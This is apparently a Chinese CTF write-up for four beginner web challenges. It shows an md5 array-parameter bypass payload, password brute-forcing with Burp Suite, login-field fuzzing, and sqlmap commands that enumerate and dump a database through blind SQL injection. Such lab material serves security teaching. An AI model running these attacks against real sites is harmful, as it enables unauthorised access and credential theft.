0x01 CheckMe05
题目源码:
<?php
$a=$_GET["a"];
$b=$_GET["b"];
if($a!==$b && md5($a)===md5($b)){
echo($flag);
}
?>
强类型比较,当给md5()提供的变量为数组时,返回null,则有null === null
,这样可以绕过强类型比较
所以最终payload:
GET /?a[]=1&b[]=2
0x01 CheckMe06
下载题目给的附件📎:list.txt
进入环境使用Burpsuite
或者yakit
抓包,用户名为admin
爆破密码:
在返回包中得到flag
0x01 CheckMe07
进入环境,还是登入页面。
对username
和password
fuzz一下直接出flag:
0x01 CheckMe08
这题演示一下使用
sqlmap
的基本步骤
还是那个登入页面,使用burpsuite
抓包,右键抓的数据包选择copy to file
然后使用sqlmap,测试出这是时间盲注:
❯ sqlmap -r "/Users/q1jun/Downloads/post.txt" --dbs
这题中如果看不懂英文,一路回车即可,该命令如果sqlmap测试成功,则会返回数据库名。
爆表名:
sqlmap -r "/Users/q1jun/Downloads/post.txt" -D sql --tables
爆列名:
sqlmap -r "/Users/q1jun/Downloads/post.txt" -D sql -T user --columns
查看password
列的数据,拿到flag:
sqlmap -r "/Users/q1jun/Downloads/post.txt" -D sql -T user -C password --dump